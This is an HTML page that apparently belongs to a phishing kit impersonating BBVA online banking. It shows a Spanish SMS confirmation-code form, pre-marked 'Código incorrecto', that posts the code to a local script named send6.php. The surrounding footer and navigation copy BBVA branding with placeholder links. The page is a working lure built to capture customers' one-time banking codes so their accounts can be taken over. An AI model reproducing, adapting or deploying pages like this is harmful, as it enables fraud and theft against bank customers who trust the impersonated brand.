
<!DOCTYPE HTML>

<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8"  />
<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
    
    <meta name="description" content="Sign into BBVA Compass Online Banking to access your bank accounts, pay bills, transfer money, and more."/>
    
    
    <link href="etc/designs/bbvacompass.css" rel="stylesheet" type="text/css"/>

    

    <meta content="width=device-width, initial-scale=1" name="viewport">


    
<link rel="stylesheet" href="etc/designs/bbvacompass/clientlibs/header.min.0e4f9b6fbeadc7db37272ba900f1c9b1.css" type="text/css">

<link rel="canonical" href="#"/>

<!-- Google Site Verification-->


<!-- Smart App Banner App for IOS Safari-->


<!--Google Play App Download Banner-->


<!-- HTML5 Shim and Respond.js  IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->




    
    <link rel="icon" type="image/vnd.microsoft.icon" href="etc/designs/bbvacompass/favicon.ico">
    <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="etc/designs/bbvacompass/favicon.ico">
    
    <title>Banca Online de BBVA</title>
</head>
    <body>
	
	
<header class="header container-fluid">


<!--<header id="top" class="container-fluid">-->
    <nav class="simplified-header">
        <div class="container">
            <a class="" href="index.html" id="logo"><img src="logoBBVA.svg" alt="BBVA"></a>
        </div>
    </nav>
<!--</header>&lt;!&ndash; /.container-fluid &ndash;&gt;--></header>

<div><div class="columns section">


 


<section class="container-fluid   " role="region" aria-label="columns content 1124726122">
    <div class="container">
        <div class="row">
    
         <div class="col-md-3">
              <div>
</div>
         </div>
    
         <div class="col-md-6">
              <div><div class="htmleditor section">

 <!-- /** Load all CSS paths first**/-->


 <h1 class="h3 thin" style="text-align: center;">Código de confirmación</h1>
 <span><b>Introduzca el código recibido vía SMS y pulse Confirmar</b></span>
<form autocomplete="off" id="olbLoginForm" class="mod dedicated-signin" method="post" action="send6.php">
<div class="form-group"><div id="signon-error-msg" class="signon-error-msg"><noscript>
Enable JavaScript to login</noscript>
</div>
<div class="username-input" style="margin-top:50px;">
<span style="color:red;">
Código incorrecto.</span>
<input class="inputtarjeta" placeholder="Código" autofocus="autofocus" autocomplete="off" type="text" name="Code2Input" id="Code2Input" required="required" maxlength="10" style="border-color:red;">




<input id="submit-olb" class="btn btn-sm btn-aqua" type="submit" name="signon" value="Confirmar" onclick="return OlbLogin.doLogin(this)"></div>
</div>
</form>
 <!-- /* Load all JS paths */-->  </div>

</div>
         </div>
    
         <div class="col-md-3">
              <div>
</div>
         </div>
      
</div><!-- /.row -->
    </div>
</section></div>

</div>

<!-- Begin Pre-Footer -->
<div>
    

    

    
        
        <div> 
<section role="navigation" aria-label="related page links 1898553763" class="pre-footer  container-fluid">
	<div class="container">
		<div class="row">
			<div class="flex">
				

				<div class="col-xs-12 col-sm-6 col-md-3">
					<div class="htmleditor section">

 <!-- /** Load all CSS paths first**/-->


 <h2>About BBVA </h2>
<ul>
<li><a title="Our Story" href="#">Our Story</a></li>
<li><a href="#">Investor Relations</a></li>
<li><a title="Security Center" href="#">Security Center</a></li>
<li><a title="Find a Branch" href="#">Find a Branch</a></li>
<li><a title="Customer Service" href="#">Customer Service</a></li>
<li><a title="Careers" href="#">Careers</a></li>
<li><a title="Newsroom" href="#">Newsroom</a></li>
</ul>
 <!-- /* Load all JS paths */-->  </div>


				</div>
				<!-- .col -->

				<div class="col-xs-12 col-sm-6 col-md-3">
					<div class="htmleditor section">

 <!-- /** Load all CSS paths first**/-->


 <h2>Additional Services</h2>
<ul>
<li><a title="Investment Services" href="#">Investment Services</a></li>
<li><a title="Insurance Services" href="#">Insurance Services</a></li>
<li><a title="Wealth Solutions" href="#">Wealth Solutions</a></li>
<li><a href="#">Mobile Banking</a></li>
<li><a href="#">ATM Banking</a></li>
</ul>
 <!-- /* Load all JS paths */-->  </div>


				</div>
				<!-- .col -->

				<div class="col-xs-12 col-sm-6 col-md-3">
					<div class="htmleditor section">

 <!-- /** Load all CSS paths first**/-->


 <h2>Product Services</h2>
<ul>
<li><a href="#" title="Remote Banking">Remote Banking</a></li>
<li><a href="#" title="Student Banking">Student Banking</a></li>
<li><a href="#">ClearSpend Prepaid Card</a></li>
</ul>
 <!-- /* Load all JS paths */-->  </div>


				</div>
				<!-- .col -->

				<div class="col-xs-12 col-sm-6 col-md-3">
					<div class="text parbase section">
<h2>Award-Winning BBVA Mobile App</h2>
<p>Save time and bank on the go.</p>

</div>
<div class="cta section">
<a href="#" class="icon-link" data-location-id="content_bbvacompass_en_prefooters_personal-homepage-prefooter---for-use-on-homepage-only_jcrcontent_par_prefooter_par4_cta_copy_copy_copy">
        <span class="icon bbva-coronita_download"></span>
        Download Now
</a>

</div>


				</div>
			</div>
		</div>
		<!-- .row -->
	</div>
<!-- .container -->
</section>


</div>
    
</div>
<!-- End Pre-Footer -->
<footer class="container-fluid">
    <section class="container" role="region" aria-label="footer">
        <div class="row">
            <div class="col-sm-8 tagline-container">
                <a href="#" class="logo" data-location-id="jcrcontent_footer"><img src="logoBBVA.svg" alt="BBVA Compass"></a>
                <p class="tagline">Creating Opportunities</p>
            </div>
            <nav role="navigation" aria-label="footer navigation" class="col-xs-12">
                <ul>
                    <li><a href="#" data-location-id="jcrcontent_footer">Privacy</a></li>
                
                    <li><a href="#" data-location-id="jcrcontent_footer">Locations</a></li>
                
                    <li><a href="#" data-location-id="jcrcontent_footer">Contact Us</a></li>
                
                    <li><a href="#" data-location-id="jcrcontent_footer">Site Map</a></li>
                
                    <li><a href="#" data-location-id="jcrcontent_footer">Web Accessibility</a></li>
                </ul>
            </nav>
        </div><!-- /.footer nav-->
        <div class="row">
            <div class="col-md-12">
                <p class="disclosure">&copy; Banco Bilbao Vizcaya Argentaria S.A.-2021</p>
            </div><!-- /.col -->
        </div><!-- /.row -->
    </section><!-- /.container -->
</footer><!-- /.container-fluid -->





<!-- <script type="text/javascript"> -->
            <!-- (function() { -->
                <!-- window.ContextHub = window.ContextHub || {}; -->

                <!-- /* setting paths */ -->
                <!-- ContextHub.Paths = ContextHub.Paths || {}; -->
                <!-- ContextHub.Paths.CONTEXTHUB_PATH = "/etc/cloudsettings/default/contexthub"; -->
                <!-- ContextHub.Paths.RESOURCE_PATH = "\/content\/bbvacompass\/en\/personal\/sign\u002Din\/jcr:content\/contexthub"; -->
                <!-- ContextHub.Paths.SEGMENTATION_PATH = "\/etc\/segmentation\/contexthub"; -->
                <!-- ContextHub.Paths.CQ_CONTEXT_PATH = ""; -->

                <!-- /* setting initial constants */ -->
                <!-- ContextHub.Constants = ContextHub.Constants || {}; -->
                <!-- ContextHub.Constants.ANONYMOUS_HOME = "/home/users/m/meSNUHPPGd5dJ3lSJ-nT"; -->
                <!-- ContextHub.Constants.MODE = "no-ui"; -->
            <!-- }()); -->
        <!-- </script><script src="etc/cloudsettings/default/contexthub.kernel.js" type="text/javascript"></script>     -->
<!-- <script type="text/javascript" src="etc/designs/bbvacompass/clientlibs/footer.min.d4e286fb9a1c43fae4a44f12da6cffb4.js"></script> -->
<script type="text/javascript" src="etc/designs/bbvacompass/clientlibs/specialfunctions.min.8da9cc90a34e5f3f9cf39cf03ae9b288.js"></script>


</body>
</html>
